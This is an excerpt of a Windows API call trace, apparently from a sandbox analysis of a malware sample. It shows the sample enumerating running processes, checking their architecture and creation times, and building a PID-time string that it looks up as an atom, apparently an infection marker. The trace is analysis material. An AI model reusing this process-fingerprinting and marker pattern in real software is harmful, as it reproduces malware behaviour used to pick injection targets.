	[0072.708] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.708] CloseHandle (hObject=0x224) returned 1
	[0072.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.708] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.708] CloseHandle (hObject=0x224) returned 1
	[0072.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.709] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.709] CloseHandle (hObject=0x224) returned 1
	[0072.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.709] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.709] CloseHandle (hObject=0x224) returned 1
	[0072.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e8b0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.709] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.709] CloseHandle (hObject=0x224) returned 1
	[0072.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.709] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.709] CloseHandle (hObject=0x224) returned 1
	[0072.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.709] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.709] CloseHandle (hObject=0x224) returned 1
	[0072.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728998, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.710] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.710] CloseHandle (hObject=0x224) returned 1
	[0072.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.710] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.710] CloseHandle (hObject=0x224) returned 1
	[0072.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.710] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.710] CloseHandle (hObject=0x224) returned 1
	[0072.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.710] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.710] CloseHandle (hObject=0x224) returned 1
	[0072.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e6a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.711] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.711] CloseHandle (hObject=0x224) returned 1
	[0072.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.711] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetLastError () returned 0x5
	[0072.712] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.712] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.712] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.713] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetLastError () returned 0x5
	[0072.714] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.715] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.715] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.715] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.715] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.715] CloseHandle (hObject=0x224) returned 1
	[0072.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.715] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.715] CloseHandle (hObject=0x224) returned 1
	[0072.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.715] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.716] CloseHandle (hObject=0x224) returned 1
	[0072.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16db8) returned 0xc0000004
	[0072.755] VirtualAlloc (lpAddress=0x0, dwSize=0x16eb8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16eb8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0072.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.760] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.760] CloseHandle (hObject=0x224) returned 1
	[0072.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728a18, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.760] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.760] CloseHandle (hObject=0x224) returned 1
	[0072.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7289f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.760] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.760] CloseHandle (hObject=0x224) returned 1
	[0072.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.761] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.761] CloseHandle (hObject=0x224) returned 1
	[0072.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.761] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.761] CloseHandle (hObject=0x224) returned 1
